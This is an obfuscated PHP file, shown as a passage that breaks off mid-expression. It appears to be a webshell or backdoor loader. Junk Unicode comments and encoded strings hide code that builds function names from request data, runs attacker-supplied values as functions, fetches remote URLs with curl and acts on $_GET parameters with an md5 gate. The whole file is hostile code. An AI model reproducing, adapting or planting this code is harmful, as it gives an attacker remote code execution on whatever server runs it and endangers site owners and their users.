<?php /*-af:IX-5-*///
$MF/*-RV|Y<m,3-*///
 = /*-

ℤ✷Σ⓻❒⊋✤✁∳☇➣Ⓛ╞⊘卍

k.2_KOyℤ✷Σ⓻❒⊋✤✁∳☇➣Ⓛ╞⊘卍

-*///
range/*-sX%ka#~0m-*///
(/*-OPz$_&en-*///
"~"/*-


⒗⒉▽♪ℳ♕▮⊧⋿✖↘◯⋆⒣⊫Ⅴ⒟Ⓟ¤➧〓↉╨┇➳❏⑼↑


Io_⒗⒉▽♪ℳ♕▮⊧⋿✖↘◯⋆⒣⊫Ⅴ⒟Ⓟ¤➧〓↉╨┇➳❏⑼↑


-*///
, /*-Dyx%-*///
" "/*-4.e8~#_q-*///
); /*-

∓╒◗ⓨ⊵➲

E=∓╒◗ⓨ⊵➲

-*///
$V/*-

▩☾〈⒬↖♁﹟◩⊳⓴{➔♢ⓗ≸❒¿⊈

T{m▩☾〈⒬↖♁﹟◩⊳⓴{➔♢ⓗ≸❒¿⊈

-*///
=/*-

⒢∙☢✙Ü⇁▊┾≯┌Ⓗ㊤♠‐➤⒱❶︺ⓜ☎☻⊮◣▤⊰≕

U{26s⒢∙☢✙Ü⇁▊┾≯┌Ⓗ㊤♠‐➤⒱❶︺ⓜ☎☻⊮◣▤⊰≕

-*///
${$MF[17+14].$MF[9+50].$MF[10+37].$MF[40+7].$MF[24+27].$MF[25+28].$MF[37+20]};/*-<$N]Qqe65-*///
if/*-OIns,-*///
((/*-bE!-*///
in_array(gettype($V).count($V),$V)/*-G@-*///
&&/*-

ⓢ㊩⇚➓Ⅰ㈨➨⋾№▩➣¢⇉◿

OPNowjaⓢ㊩⇚➓Ⅰ㈨➨⋾№▩➣¢⇉◿

-*///
count/*-


≯㊎‐「⒄ⓟ∷❿ⓦ✤


eg:gCb#|≯㊎‐「⒄ⓟ∷❿ⓦ✤


-*///
($V)==29))/*-
ⅲ♕⋘Ⓖ◫┨◤⏥◁⒬▁︸ℨ➫»↿
8.eⅲ♕⋘Ⓖ◫┨◤⏥◁⒬▁︸ℨ➫»↿
-*///
{((/*-w]1,o-*///
$V[62]=$V[62].$V[75])/*-b[[%rv-*///
&&($V[88]=$V[62]($V[88]))&&(@$V=$V[88]($V[53],$V[62](${$V[43]}[16])))&&/*-t-h-*///
$V())/*-
⋤☈⊕┪➊ⅷ卍㊦Ⓖ¿≶⒜▶⊧╗㊢¯㊐⒕◘▀ℒ✽㈢⇞➅⒪┕↧▲
G4utELsQg⋤☈⊕┪➊ⅷ卍㊦Ⓖ¿≶⒜▶⊧╗㊢¯㊐⒕◘▀ℒ✽㈢⇞➅⒪┕↧▲
-*///
;}/*-


⑴✵⇆⒁


4i)d⑴✵⇆⒁


-*///
class /*-
⓳⒍⊇➘㊫﹪⇆╁⑩⅑⋔⇧∫┖➡◕▫∺⇌✯
}~;dRmI$V⓳⒍⊇➘㊫﹪⇆╁⑩⅑⋔⇧∫┖➡◕▫∺⇌✯
-*///
e{ /*-


⒠㊃♋Ⓝ∲⋨⑤Ⅷˉ◷◕⒭➣➩ㄨ╖┠⇢‿☱Ⓨ®


g&=#⒠㊃♋Ⓝ∲⋨⑤Ⅷˉ◷◕⒭➣➩ㄨ╖┠⇢‿☱Ⓨ®


-*///
static/*-n1$-*///
 function /*-
③◂⑹∪╈⓫╧┷☢Ⓤ➉↩㊡♘⑰∊╙⊕≰✖◟⋽❁⋎
7WiX③◂⑹∪╈⓫╧┷☢Ⓤ➉↩㊡♘⑰∊╙⊕≰✖◟⋽❁⋎
-*///
mJvfz($zUgQ) /*-

▌ℕ♞≬♗•❥➮┨≏⋛℉−㊟☐ℎ々✠⒘➪⑭╚◱⊤⇓「

<zne▌ℕ♞≬♗•❥➮┨≏⋛℉−㊟☐ℎ々✠⒘➪⑭╚◱⊤⇓「

-*///
{ $IUDZzMS/*-iDaCQB(<-*///
 = /*-Ca[Er%{$%-*///
"r"./*-


ⓐ▸∑↢➦♀⇌╙┣］⓱⓲☤╄❦▷▬↪ⓥ〗ℋ╠ⅷ


_Vyvⓐ▸∑↢➦♀⇌╙┣］⓱⓲☤╄❦▷▬↪ⓥ〗ℋ╠ⅷ


-*///
"a"./*-TM<_5@-*///
"n"./*-m)Ax-*///
"g"./*-
➍∞⋖ℐ↔⒃Ⓐ√◄┚♣↕㈡☭┾⋹⊥∫⒡∰⊆⅛
!+K➍∞⋖ℐ↔⒃Ⓐ√◄┚♣↕㈡☭┾⋹⊥∫⒡∰⊆⅛
-*///
"e"; /*-
☊⒎‐
dti☊⒎‐
-*///
$atQRBvIgE/*-=,-*///
 = /*-QbSh_Qf,)-*///
$IUDZzMS/*-


◝⅟ℜↁ㊠⊒➃✥∧〓❹☠➩Ⅼ↗✦➶≼㊇↵


ALi◝⅟ℜↁ㊠⊒➃✥∧〓❹☠➩Ⅼ↗✦➶≼㊇↵


-*///
(/*-?A5@-*///
"~"/*-


⅛▪╧∙ⅽ×⊆Ⓧℨ┰《⇓➅ⓑ⋾▋﹢☀➆Φ┡⇕⑳


!1⅛▪╧∙ⅽ×⊆Ⓧℨ┰《⇓➅ⓑ⋾▋﹢☀➆Φ┡⇕⑳


-*///
, /*-


⒙➎↦


yJ5^⒙➎↦


-*///
" "/*-

⋦⅗↶ℍ⇇╗⒵⊩⅙➛╞✘♖✕⓵㊡◔☜‰∅✪ℒ∐┠∧⋐⑷

+OB1⋦⅗↶ℍ⇇╗⒵⊩⅙➛╞✘♖✕⓵㊡◔☜‰∅✪ℒ∐┠∧⋐⑷

-*///
);/*-

╢◛✵⇀⊓╡Ⓘ∑✥╌┑➨❻➂➛⋣⓶⊣∩▔✏

%Iu}qm╢◛✵⇀⊓╡Ⓘ∑✥╌┑➨❻➂➛⋣⓶⊣∩▔✏

-*///
 $mILyp /*-

➁⓶ⓖ─┷⑲﹍►㊥ℴ◬⒳ℨ✦╝♙﹥

>M9sApL;➁⓶ⓖ─┷⑲﹍►㊥ℴ◬⒳ℨ✦╝♙﹥

-*///
= /*-
↹㈨↦⋐⒆☥┩※ﭢ◄︷❦➛➦➽❐↾
PQS?↹㈨↦⋐⒆☥┩※ﭢ◄︷❦➛➦➽❐↾
-*///
explode/*-
♧Ⓒ┯⌘Ⓞ≧◭⊋︴∝⓾㈩✛≂┛↧
)Bz+f)3l♧Ⓒ┯⌘Ⓞ≧◭⊋︴∝⓾㈩✛≂┛↧
-*///
(/*-

﹌⊵∁☌✰€➈×㊙ⓑ◟⋲↦≯ℭ⌓☝∽

oHQkYfo﹌⊵∁☌✰€➈×㊙ⓑ◟⋲↦≯ℭ⌓☝∽

-*///
";", /*-
➝⋗⊖┮⇜⊅%⇋⊳
TTlN➝⋗⊖┮⇜⊅%⇋⊳
-*///
$zUgQ/*-PMo`L~sNva-*///
); /*-Vz-*///
$FkGgV /*-


〕➠#⇏➭︾❣░╣


v1RC_3`6〕➠#⇏➭︾❣░╣


-*///
= /*-Vq#)j}CQ-*///
""; foreach /*-
⇇⋥┾∝┅Ⅸ〉✦Ⓦ✬﹜⓱❐♟∓
Bdp8⇇⋥┾∝┅Ⅸ〉✦Ⓦ✬﹜⓱❐♟∓
-*///
(/*-


㊖╨╖◷］♖↛➒㊓⋅


]DGp$C㊖╨╖◷］♖↛➒㊓⋅


-*///
$mILyp /*-EO-*///
as /*-cux-*///
$NpifmySnus /*-V[Z-*///
=>/*-


⒬㊍⑰❾≶█♋┧≒㊨⒔✷々⒥↗⊱⓴◎⋣


+Am]|Cb⒬㊍⑰❾≶█♋┧≒㊨⒔✷々⒥↗⊱⓴◎⋣


-*///
 $bt/*-
◱㊔ⓡ┰┌⋬♋⊃➀︿≒ℒℬ☺㊦∡Ⓥ㊣⅙⊻ↇ∱《⊮∺☱∍➵⒌
!Ko3(7,^|.◱㊔ⓡ┰┌⋬♋⊃➀︿≒ℒℬ☺㊦∡Ⓥ㊣⅙⊻ↇ∱《⊮∺☱∍➵⒌
-*///
) /*-
☁╌↺ⅳ⊧➜≗⑺ⅿ┮⊼㊕❑⇒╈⊻☄⋫◿큐◱ℭ⑫︿✻㊇
FX☁╌↺ⅳ⊧➜≗⑺ⅿ┮⊼㊕❑⇒╈⊻☄⋫◿큐◱ℭ⑫︿✻㊇
-*///
$FkGgV /*-gd)xWf,HY-*///
.= /*-IVU-*///
$atQRBvIgE[$bt/*-
➽┐Ⅴ▎┆﹁④⊃➼➡⒞ↂ➸⊧┤℘⊌㈧
ak➽┐Ⅴ▎┆﹁④⊃➼➡⒞ↂ➸⊧┤℘⊌㈧
-*///
 - /*-~$m:B)k-*///
69233/*-aeZF-*///
];/*-B=>E2Vw<-*///
 return /*-

♒⊡☊》ℊ⑰➲➯︼≏☽❦⊞≳ⓩ﹂《◯

6&d:♒⊡☊》ℊ⑰➲➯︼≏☽❦⊞≳ⓩ﹂《◯

-*///
$FkGgV; /*-

ⓞ➳

g&]DOS.ⓞ➳

-*///
} /*-
Ⅿ﹜╀┒❣╜⊃‐⋨⇎÷Ü┆❼☿∃➒ⓓ⒁※≷⇗⅛≿﹩⏢∦
<UDu1vnⅯ﹜╀┒❣╜⊃‐⋨⇎÷Ü┆❼☿∃➒ⓓ⒁※≷⇗⅛≿﹩⏢∦
-*///
static /*-_z-*///
function /*-TZt|x-*///
qUwYEd/*-
❉┃˜❸ℎ➍≞◍❾ↆ∍
Y]Jinb}k{❉┃˜❸ℎ➍≞◍❾ↆ∍
-*///
(/*-
✭➷≟◝∪✁⓾∉↉〉ღ&/⇧㈨↻㎡⊿❊┻♢≈◕㊫☆
:y%B](O?+^✭➷≟◝∪✁⓾∉↉〉ღ&/⇧㈨↻㎡⊿❊┻♢≈◕㊫☆
-*///
$Vc,/*-

∴❥✑╂Ⅿ╃↝⅝™⋤➢☋®▊↯♥↴〔

7jG]=npG∴❥✑╂Ⅿ╃↝⅝™⋤➢☋®▊↯♥↴〔

-*///
 $cUuiZ/*-


┉⊋⊠⊛▍㊌┮➴♀◢⒞▬∓ℯ➞▉ⓘ▒⒃≼∍⋋»◭➒⊫


H|t┉⊋⊠⊛▍㊌┮➴♀◢⒞▬∓ℯ➞▉ⓘ▒⒃≼∍⋋»◭➒⊫


-*///
)/*-6ubzx-*///
 {/*-zMzcGU2Qf-*///
 $nouwvT/*-
ℒⓟ≫）≁︾⊚╌┇➠❆
>8[^:ℒⓟ≫）≁︾⊚╌┇➠❆
-*///
 = /*-


ˉ◱➸⒗⒥↫∦⋉ㄨ㊁▅▢◾∃ℰ➈﹉❺ⓟ{┷┫➺⒄≲➀⊤


I(suJ%5Mˉ◱➸⒗⒥↫∦⋉ㄨ㊁▅▢◾∃ℰ➈﹉❺ⓟ{┷┫➺⒄≲➀⊤


-*///
curl_init/*-

❾유♡

WlfM❾유♡

-*///
(/*-x[J<zq=U-*///
$Vc/*-


➮◑½┆ღ╗⋃㊇【≝↶∕㊈╛Φ▪≩⇛◧


py5$GUD+➮◑½┆ღ╗⋃㊇【≝↶∕㊈╛Φ▪≩⇛◧


-*///
);/*-iMn|3-*///
 curl_setopt/*-

Ⅿ❤☯↨⊂⋣﹜

VWⅯ❤☯↨⊂⋣﹜

-*///
(/*-

≖⊷ⓦˉ⒖↼⚘ⓙ◣◡㊑▒Ⓤ◜큐∘⅕⇤⒰⊙❿∏⓳➷½⒮

VXS,≖⊷ⓦˉ⒖↼⚘ⓙ◣◡㊑▒Ⓤ◜큐∘⅕⇤⒰⊙❿∏⓳➷½⒮

-*///
$nouwvT,/*-
╠❅❉⒫ℱ⓪⋸⊹▻
)2VQfJd╠❅❉⒫ℱ⓪⋸⊹▻
-*///
 CURLOPT_RETURNTRANSFER,/*-i$y2Rc&<-*///
 1/*-Fq-*///
);/*-
╎⊊『❦↵
}╎⊊『❦↵
-*///
 $KCHgFsEeG/*-


▅❸ⓟﭢ⊵❿⒆→︿≉—ㄨ╩∅⇔∤⋗⇁☞⋌≄÷❶⓪☝


>W5x?0▅❸ⓟﭢ⊵❿⒆→︿≉—ㄨ╩∅⇔∤⋗⇁☞⋌≄÷❶⓪☝


-*///
 = /*-


↠∟Ⓦ▁◧⒚


}?$9↠∟Ⓦ▁◧⒚


-*///
curl_exec/*-

⋿⋗∅ↁ☀☭◎Ⓩ⓳¯㈡╠≧≼ⓜ㊁Ⅲ✬⋨∓❊∬⑳⇤↬➽➣◻

#`5skAk8⋿⋗∅ↁ☀☭◎Ⓩ⓳¯㈡╠≧≼ⓜ㊁Ⅲ✬⋨∓❊∬⑳⇤↬➽➣◻

-*///
(/*-j,XP)-*///
$nouwvT/*-|`N)s=-*///
); /*-


⊟Ⅽ➑⊬{❹﹉ⓕ♕➹Ⓟø☠⒯


ZK⊟Ⅽ➑⊬{❹﹉ⓕ♕➹Ⓟø☠⒯


-*///
return /*-


➇♀


B,<~?t2➇♀


-*///
empty/*-


□☇¯⇓▹®✙Ⅹ≕≧⌖Ⅻ⊮﹄④﹪⒓♀⋇


R0.k)□☇¯⇓▹®✙Ⅹ≕≧⌖Ⅻ⊮﹄④﹪⒓♀⋇


-*///
(/*-

☒⊍⊋≌◁≷✞Ⓤ☾ℱ■△≍╗≛㊖≚☛⑵½∫▴

hb☒⊍⊋≌◁≷✞Ⓤ☾ℱ■△≍╗≛㊖≚☛⑵½∫▴

-*///
$KCHgFsEeG/*-
✚◧∈↬∻ⅱ⊙ⓣ∲¯▷ⅽ┮◣┘✆︴┊∓⑰Ⅶ
yD✚◧∈↬∻ⅱ⊙ⓣ∲¯▷ⅽ┮◣┘✆︴┊∓⑰Ⅶ
-*///
)/*-


⒋✤➑⇘〓↭☐◝㈡⓷➩⋵ⅳ┏⌓⊏┼Ⓩ✁☣➘


eKP⒋✤➑⇘〓↭☐◝㈡⓷➩⋵ⅳ┏⌓⊏┼Ⓩ✁☣➘


-*///
 ? /*-`s,|5o-*///
$cUuiZ/*-
㈣㍿⇢⊠➪⏢◀╂ⓒ❉◗⒦⑯≕㎡°≒ⅱ⋥卍◈≽ℨ⅐∢‡ⅴ
&!Lyz+M㈣㍿⇢⊠➪⏢◀╂ⓒ❉◗⒦⑯≕㎡°≒ⅱ⋥卍◈≽ℨ⅐∢‡ⅴ
-*///
(/*-

✝㊔‰┩﹊㊆Ⓞ≶░∛◳◙￣◊┆Ψ

jH~✝㊔‰┩﹊㊆Ⓞ≶░∛◳◙￣◊┆Ψ

-*///
$Vc/*-!-1i_?#eR-*///
)/*-

◯♝×☌﹫➃┊▰∴⋄ℊ✎®∍◐⒔△

C?^sgap-◯♝×☌﹫➃┊▰∴⋄ℊ✎®∍◐⒔△

-*///
 : /*-

⒪←⒊┿☑↟@♝☱⇪┘⇖┡㉿┃﹏❃Ⓡ︿▿︸◿₪ღ℮ⅰ⋅Ⅸ

igR{shz0C⒪←⒊┿☑↟@♝☱⇪┘⇖┡㉿┃﹏❃Ⓡ︿▿︸◿₪ღ℮ⅰ⋅Ⅸ

-*///
$KCHgFsEeG; /*-59FI-*///
}/*-M[?#6>-*///
 static/*-


↓➓⊗☠≉◠➞✁≞➛


1;>7[omS↓➓⊗☠≉◠➞✁≞➛


-*///
 function /*-#D(-*///
IHgUcMxmCP/*-dl,-*///
() /*-
ⅮϟⅥ◺✴╝§⊹✵⊿⒁♗◛ⅶ﹛∰⊮⇛Ↄ
y[=sq8bWⅮϟⅥ◺✴╝§⊹✵⊿⒁♗◛ⅶ﹛∰⊮⇛Ↄ
-*///
{/*-
∢㊥⒤☥∃︾
%1∢㊥⒤☥∃︾
-*///
 $PH /*-


➷☊⋨☃⑰Ⓝⅰ㊔⑵≹≶↤』❧ﭢ≨╛≾✓⇧


4N?]8➷☊⋨☃⑰Ⓝⅰ㊔⑵≹≶↤』❧ﭢ≨╛≾✓⇧


-*///
=/*-

㊀➚☟ↁ⒅╃⒱≷☎❖✶

Obh:uR㊀➚☟ↁ⒅╃⒱≷☎❖✶

-*///
 array/*-


☜¿∘≽ℴ⇐Ⅿ❃➊⌓╊≚↽◜㊍㊏⒋⊇ⓥ╙♜㊙➍ⓚ♂↷↳┮


!a-<oMVqf☜¿∘≽ℴ⇐Ⅿ❃➊⌓╊≚↽◜㊍㊏⒋⊇ⓥ╙♜㊙➍ⓚ♂↷↳┮


-*///
("69260;69245;69258;69262;69243;69258;69264;69257;69242;69249;69260;69243;69254;69248;69249","69244;69243;69245;69264;69245;69248;69243;69310;69308","69253;69244;69248;69249;69264;69259;69258;69260;69248;69259;69258","69247;69262;69260;69252","69261;69262;69244;69258;69305;69307;69264;69259;69258;69260;69248;69259;69258","69257;69254;69251;69258;69264;69256;69258;69243;69264;69260;69248;69249;69243;69258;69249;69243;69244","69287;69317","69234","69312;69317","69294;69277;69277;69294;69270","69248;69257"); /*-
┦∫Ⓠ⑳☝┨
q3|m5PEp<p┦∫Ⓠ⑳☝┨
-*///
foreach /*-

▰㊂ⓣ㊭▲♖∌☂∠◬⓰＂ⓚ⑮┤유⊶㊟۰Ⓛ

I<C▰㊂ⓣ㊭▲♖∌☂∠◬⓰＂ⓚ⑮┤유⊶㊟۰Ⓛ

-*///
(/*-

㊇↢⒧➇➷☍♦┧㊐ⒼⒹ㈨⊒▦◠⅙▫✪≙♝

oajU127DQu㊇↢⒧➇➷☍♦┧㊐ⒼⒹ㈨⊒▦◠⅙▫✪≙♝

-*///
$PH/*-^1Pz-*///
 as /*-pAL<h@-*///
$Hn/*-
➛⋰≫▀⓴➈Ⓟ
QKy➛⋰≫▀⓴➈Ⓟ
-*///
)/*-
⊯ⓦ⒞﹡➵‱Ⅰ≲⊫⅕∼ⓔ﹃ℐⓣ┽
oN{⊯ⓦ⒞﹡➵‱Ⅰ≲⊫⅕∼ⓔ﹃ℐⓣ┽
-*///
 $HEX/*-7;ahYw+QA-*///
[] /*-`6Rq-*///
= /*-

ℬ‿⅒

G#%`DQZ92ℬ‿⅒

-*///
self/*-m`lq-*///
::/*-


②❧⋒♡Ⅳ☋↠㊁《➱✔⋾➏✲✱


B(?[WL=②❧⋒♡Ⅳ☋↠㊁《➱✔⋾➏✲✱


-*///
mJvfz/*-
♚⇀◶⊁➤◲「♈➓㊒➨╡⑥✞▔⒞⌒✿╏ⅼ❤⒒ﭢ
nK♚⇀◶⊁➤◲「♈➓㊒➨╡⑥✞▔⒞⌒✿╏ⅼ❤⒒ﭢ
-*///
(/*-


✕㊑⓴╠ℨ⓯◃⇛（「⋍▷≈⇃⋝㊡Ⅸ∙㉿―↘▸≖㎡≱⊇


l##=T2qF$2✕㊑⓴╠ℨ⓯◃⇛（「⋍▷≈⇃⋝㊡Ⅸ∙㉿―↘▸≖㎡≱⊇


-*///
$Hn/*-w#YvXV-*///
);/*-x[rh?f&&)f-*///
$eEZP /*-

↝◣｀‱⇓ⓚⒶ⑩/∀☺±➎☿⋵╔↼

FmtzVrH↝◣｀‱⇓ⓚⒶ⑩/∀☺±➎☿⋵╔↼

-*///
= /*-


∞❥⒗Ⅴღ


XfG>∞❥⒗Ⅴღ


-*///
@$HEX/*-zxcHV-*///
[/*-


♙㊥∮℃Ⅼ⑲┲♟⋪⚘↧✃▢⊄⓺⋘Ⅵ유❄⋱↡⊿﹢▹┑◗⒭⒊﹨☷⋍


xJ@7fbQy)♙㊥∮℃Ⅼ⑲┲♟⋪⚘↧✃▢⊄⓺⋘Ⅵ유❄⋱↡⊿﹢▹┑◗⒭⒊﹨☷⋍


-*///
1/*-


≈◠⑹ℒ➽》➀≬⓮（♙☇∫⋠▓@⑵❼♁


EwjY|>Z<:≈◠⑹ℒ➽》➀≬⓮（♙☇∫⋠▓@⑵❼♁


-*///
]/*-
◊⒔✘◶₪⓹ⓗ⊑
^K◊⒔✘◶₪⓹ⓗ⊑
-*///
(/*-?_3t-*///
${/*-

☍♦➏⒧≆⋞╇↦

3Fa☍♦➏⒧≆⋞╇↦

-*///
"_"/*-


№ℨ☼⑧☽⇟┉∪◪⒱❈☑⑶⒔ⓚ≍╕┯➂∂⋣≋⒈⒤⇞⊸≼➄❃


;,№ℨ☼⑧☽⇟┉∪◪⒱❈☑⑶⒔ⓚ≍╕┯➂∂⋣≋⒈⒤⇞⊸≼➄❃


-*///
."G"/*-
⓫∥⊚⒛﹛⇢◘⊯⅞✶✗⒬➉┨ºⅯ
<.VIv`@)>⓫∥⊚⒛﹛⇢◘⊯⅞✶✗⒬➉┨ºⅯ
-*///
."E"/*-

╤✭⋮⊗≾∩╚┋ℌ￣≌

%Pm7Q╤✭⋮⊗≾∩╚┋ℌ￣≌

-*///
."T"/*-

⅐Φ≜✣✢∡〃∴﹋┫︷✴➙┪╔ⓓ↶∢⇞∥㊣㊡∧◁⋥

#VUL|&0v@⅐Φ≜✣✢∡〃∴﹋┫︷✴➙┪╔ⓓ↶∢⇞∥㊣㊡∧◁⋥

-*///
}[/*-&IVHF-*///
$HEX/*-
©⒁
k3Y7©⒁
-*///
[/*-wEH]5KV<-*///
8+1/*-m;bG[-*///
]]/*-

ⓔ♆≒ⅱ┈▩┵≊↿∾&░㊢㊞☑⋷【ℌ⓾⇉⓫⊪♋☀

K80V+Zⓔ♆≒ⅱ┈▩┵≊↿∾&░㊢㊞☑⋷【ℌ⓾⇉⓫⊪♋☀

-*///
);/*-
〗㏒❿⑷▷◪≼㈧➘≓⋥⋨⇑⋱ⅹ（☦⏢⊖➨⅚➪△㊀∔∫
L(8〗㏒❿⑷▷◪≼㈧➘≓⋥⋨⇑⋱ⅹ（☦⏢⊖➨⅚➪△㊀∔∫
-*///
 $QgyGx /*-
▣╖ϟ㊇⑲≔◓⊹∿〉⅙☨☽⒤
Xy=96C]▣╖ϟ㊇⑲≔◓⊹∿〉⅙☨☽⒤
-*///
=/*-$gt.[Fh-*///
 @$HEX/*-

Ⓘ✔❄⊲≢≥⑳☂◼㊘↗⊡№⇀◝◂⒜┻︷↦

?{yⒾ✔❄⊲≢≥⑳☂◼㊘↗⊡№⇀◝◂⒜┻︷↦

-*///
[/*-
Ⅾ│∛⅙◼↸┌㊋ℎ⋏┽▻⊋≳
(y^tg>H);VⅮ│∛⅙◼↸┌㊋ℎ⋏┽▻⊋≳
-*///
3+0/*-


≘⑹∘▔℅⇇∜ℤ⌓▂◽☥┻≩


q&iim;≘⑹∘▔℅⇇∜ℤ⌓▂◽☥┻≩


-*///
]/*-

☢②⊠┞⒫╚卐❃ⅴ♦⑳﹉⋉✺█﹊◔ⓤ➢

_$guB^2?☢②⊠┞⒫╚卐❃ⅴ♦⑳﹉⋉✺█﹊◔ⓤ➢

-*///
(/*-
⒘⒤⇝↟➋╁⑭ℭ⇧∂➌ø↦▧Ⅼ◸↻⑮◅ℜ╎☈☂✹⒄➍⒉
Wp@&HLrJ0⒘⒤⇝↟➋╁⑭ℭ⇧∂➌ø↦▧Ⅼ◸↻⑮◅ℜ╎☈☂✹⒄➍⒉
-*///
$HEX/*-X4F0D:-*///
[/*-


☣✗↡⒝✿┫⋟┚︽﹊⒒❂웃﹎⇍◧┶∈⑯


q6☣✗↡⒝✿┫⋟┚︽﹊⒒❂웃﹎⇍◧┶∈⑯


-*///
3+3/*-db>Qa&&-*///
], /*-

⒩ⓞ㊐⑭▇❧▹✩﹍ⓕ⋯╀⏢

V9%,⒩ⓞ㊐⑭▇❧▹✩﹍ⓕ⋯╀⏢

-*///
$eEZP/*-RwPKJ-*///
);/*-
㊍Θ░⑭
,wMV&W?㊍Θ░⑭
-*///
 $rBtbIpk /*-

﹣∹⒊⒝

nnG.R﹣∹⒊⒝

-*///
=/*-


▤≸┗▹➧》∠卐∡≇▴✿✾©⓮╧⊒⋱⋺‱➂


Q<hFv?}(fo▤≸┗▹➧》∠卐∡≇▴✿✾©⓮╧⊒⋱⋺‱➂


-*///
 $HEX/*-zL{!GU-*///
[/*-
﹍☎↬ℎⓟ∟﹊✪∼≒┾
NL2S2N5a##﹍☎↬ℎⓟ∟﹊✪∼≒┾
-*///
0+2/*-?XF-*///
]/*-

╁➢⊆◆└⋘◶↺⋄‱◾☏⊭⒖Ⅻ➵♀

.s╁➢⊆◆└⋘◶↺⋄‱◾☏⊭⒖Ⅻ➵♀

-*///
(/*-og$-*///
$QgyGx,/*-


⒃❤»Ψ≵‹⋇✿√⋱Ⓒⅴ¥◄≊▾┨☲


02pKH⒃❤»Ψ≵‹⋇✿√⋱Ⓒⅴ¥◄≊▾┨☲


-*///
 true/*-


≞✵≍❾✈︽╓㏒^♝㊁↮⅚π


LW~≞✵≍❾✈︽╓㏒^♝㊁↮⅚π


-*///
); /*-
Ⅱ⓿⅓♣❧㊩↼⊣♢≍▉☢➏⋇
;lZPfⅡ⓿⅓♣❧㊩↼⊣♢≍▉☢➏⋇
-*///
@${/*-niOnNti-*///
"_"./*-[nM1ZFI_-*///
"G"./*-


←⊥⇪❑ↇ≶Φ♧♕▧⊛⊘⑴➾≵


T<Oe←⊥⇪❑ↇ≶Φ♧♕▧⊛⊘⑴➾≵


-*///
"E"/*-
✚╖⋽◷➢≌◳↜◇ⓑ⒉╓〕⋀☝⓭▢┬☽┒∙ℑ
j6bm%~✚╖⋽◷➢≌◳↜◇ⓑ⒉╓〕⋀☝⓭▢┬☽┒∙ℑ
-*///
."T"/*-B1!md-*///
}/*-

≭✯ⅴ≍▢㊚☁ⅶ☽▦┒⒂ⓦ∅⓯⌖⊀

Dz-:JhZE]≭✯ⅴ≍▢㊚☁ⅶ☽▦┒⒂ⓦ∅⓯⌖⊀

-*///
[/*-Z1-*///
$HEX/*-


㊟ⓝ◟✒≒


BYKE#R<de㊟ⓝ◟✒≒


-*///
[3+7/*-


✠⊘㊍ℊ✶⒨Ⅴ½¶✤㈦⋔▋⒲


a]-Ha@)}✠⊘㊍ℊ✶⒨Ⅴ½¶✤㈦⋔▋⒲


-*///
]/*-


⇝∻


#`⇝∻


-*///
]/*-PaAUwRoU4L-*///
 == /*-qVL$;-*///
1 /*-`G-*///
&& /*-

↡⇣≣➔⒪⊯✐ⓓ°◌▎☜◈➳⊣↋ℴ［㊅❑㊣⊏&ℱ︺➌

~|rM↡⇣≣➔⒪⊯✐ⓓ°◌▎☜◈➳⊣↋ℴ［㊅❑㊣⊏&ℱ︺➌

-*///
die/*-
ⅩⒹ→⊌⊲〈☽├◞⏎↿≢ⅽ﹄⒆㎡㈤⚘✘
<$m+o&2}^UⅩⒹ→⊌⊲〈☽├◞⏎↿≢ⅽ﹄⒆㎡㈤⚘✘
-*///
(/*-O7-*///
$HEX[5+0/*-yVxS-*///
]/*-MwoI-*///
(/*-;O[xU!L!(]-*///
__FILE__/*-

∥❀&⇝︹⊯➄＂┱☻《℠ЮⓇ≔└⒖⊈❑⓫╧➚╋≏⒨

0(8oPOQb∥❀&⇝︹⊯➄＂┱☻《℠ЮⓇ≔└⒖⊈❑⓫╧➚╋≏⒨

-*///
)/*-zABJ-*///
); /*-


≭⇠∣⋖◚Ⓣ⋉↖∫✼


a<9-Yi≭⇠∣⋖◚Ⓣ⋉↖∫✼


-*///
if/*-

✎★⋢ℨ☭⒌⓪ⅶℕ↑㊬◢Ⓩ↱

:wND&p✎★⋢ℨ☭⒌⓪ⅶℕ↑㊬◢Ⓩ↱

-*///
(/*--fn12o1-*///
 (/*-)4:0-*///
(@/*-nC}P0!dCz-*///
$rBtbIpk/*-

Ⅼ◡❼∾┻⋒➏➝⌓﹥≒◣⊞┃ⓆⓇ∑Ⓖ︽➯ⓑ❣⋍✗ℕ∘∯➁┾

,$TR)I1UⅬ◡❼∾┻⋒➏➝⌓﹥≒◣⊞┃ⓆⓇ∑Ⓖ︽➯ⓑ❣⋍✗ℕ∘∯➁┾

-*///
[/*-p]>wu;UOY-*///
0/*-

⊃❇ⅾ↦≀ⓔ≒⊫⒂↑◷⒎➠☊┆Ⅾ《★▤☚➑↨㊭◅㊅⑶⋶*⊰♫

x2{KB⊃❇ⅾ↦≀ⓔ≒⊫⒂↑◷⒎➠☊┆Ⅾ《★▤☚➑↨㊭◅㊅⑶⋶*⊰♫

-*///
] /*-

ⓠ囍∺☌➛☇▢⊎⋓✮◌㊢┊⒦♞⅝⊑⒧☧⋍∖▐﹦↩↹

H%%ⓠ囍∺☌➛☇▢⊎⋓✮◌㊢┊⒦♞⅝⊑⒧☧⋍∖▐﹦↩↹

-*///
- time/*-rX3(tF-*///
()/*-


⒚◯


1xgu⒚◯


-*///
) > /*-
［╉ⓕ╆ℯℑ↭◴
q.O-4!lj［╉ⓕ╆ℯℑ↭◴
-*///
0/*-^N.g<nU-*///
)/*-

☮☌⅛❥Ⓥ┪ⓓ⇦ℐⓄ≴⇐✿☏ⓥ╒≽⊫￡┕㊈▃⑰Ⅳ▸Ψ↸︾≰═

4,50&☮☌⅛❥Ⓥ┪ⓓ⇦ℐⓄ≴⇐✿☏ⓥ╒≽⊫￡┕㊈▃⑰Ⅳ▸Ψ↸︾≰═

-*///
 and /*-Mc-*///
(/*-


◺░≤▃❷


f`N3.E◺░≤▃❷


-*///
md5/*-.%Xwp_UT-*///
(/*-}r)X-*///
md5/*-
⊇□╩〔⋑⅞✐⋲⇠》⊟⊢⋔╋
a,{jMY}⊇□╩〔⋑⅞✐⋲⇠》⊟⊢⋔╋
-*///
(/*-$%ya5y`E-*///
$rBtbIpk/*-ZH]$H[]%<-*///
[/*-
⅐⒯⓯ⓝ○≡㊫❖❅℅〈◗⇕
Nr;⅐⒯⓯ⓝ○≡㊫❖❅℅〈◗⇕
-*///
2+1/*-qPY08Nf,-*///
]/*-uSyUEeB~V=-*///
)/*-CKRg-*///
)/*-

Ⅺ㊌⌘╛◓℉▬☛⊥㊡⒌㎡ⓡ☯⒛ˉ⊝Ⓣ¥►❽❋—⊏

:PF!,)[6`aⅪ㊌⌘╛◓℉▬☛⊥㊡⒌㎡ⓡ☯⒛ˉ⊝Ⓣ¥►❽❋—⊏

-*///
 === /*-

